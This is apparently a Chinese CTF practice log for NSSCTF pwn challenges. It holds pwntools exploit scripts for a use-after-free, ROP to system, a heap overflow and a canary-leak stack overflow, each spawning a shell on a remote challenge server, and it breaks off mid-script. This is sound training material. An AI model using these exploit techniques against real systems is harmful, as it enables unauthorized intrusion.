NSSCTF PWN方向刷题记录

[NISACTF 2022]UAF

from pwn import *
context.log_level='DEBUG'
#io=process('./pwnuaf')
io=remote('1.14.71.254',28905)
elf=ELF('./pwnuaf')
def _add_note():
    io.recvuntil(":")
    io.sendline("1")
def _edit_note(id,content):
    io.recvuntil(":")
    io.sendline("2")
    io.recvuntil("Input page\n")
    io.sendline(str(id))
    io.recvuntil("Input your strings\n")
    io.sendline(content)
def _delete_note(id):
    io.recvuntil(":")
    io.sendline("3")
    io.recvuntil("Input page\n")
    io.sendline(str(id))
def _show_note(id):
    io.recvuntil(":")
    io.sendline("4")
    io.recvuntil("Input page\n")
    io.sendline(str(id))
io.recvuntil("show\n")
#gdb.attach(io,"^C")
#pause()
_add_note()
_delete_note(0)
_add_note()
nico = 0x08048642
payload = b"sh\x00\x00" + p32(nico)
#payload = b"/bin/sh\x00" + p32(nico)
_edit_note(1,payload)
#gdb.attach(io,"^C")

_show_note(0)
io.interactive()

流程：先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置（free后指针没有置为null 存在UAF漏洞）

[HNCTF 2022 Week1]ezr0p32

from pwn import *
context(os='linux', arch='i386', log_level='debug')
elf = ELF('./ezr0p')
p=remote('node1.anna.nssctf.cn',28351)
#p = process('./ezr0p')
sys_addr=elf.symbols['system']
offset=0x1c+0x04
addr_bss=0x0804A080
p.recv()
p.send('/bin/sh\x00')
p.recvuntil('time~')
payload=b'a'*offset+p32(sys_addr)+p32(0xdeedbeef)+p32(addr_bss)
p.sendline(payload)
p.interactive()

[NISACTF 2022]ezheap

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#sh=process('./pwn')
sh=remote('node2.anna.nssctf.cn',28456)
#gdb.attach(sh)
#pause()
payload=b'a'*(0x18+0x08)+b'/bin/sh\x00'
sh.sendlineafter('Input:',payload)
sh.interactive()

直接覆盖到下一个堆块

[HGAME 2022 week1]test your gdb

from pwn import *
context.log_level='debug'
#sh=process('./service')
sh=remote('node1.anna.nssctf.cn',28169)
elf=ELF('./service')
#gdb.attach(sh,'b *0x401378')
#pause()
cmptext=p64(0xb0361e0e8294f147)+p64(0x8c09e0c34ed8a6a9)
sh.sendafter(b'word\n',cmptext)
sh.recv(0x18)
canary = u64(sh.recv(8))
success(hex(canary))
payload = b'a'*0x18 + p64(canary) + b'a'*8 + p64(elf.sym['b4ckd00r'])
sh.sendline(payload)
sh.interactive()

gdb直接断到0x401378

动调发现rbp-0x40位置两个数比较，直接把两个数调试出来，绕过decrypt的过程

泄露canary之后正常打栈溢出就行

[HNCTF 2022 Week1]ret2shellcode

from pwn import *
context(arch &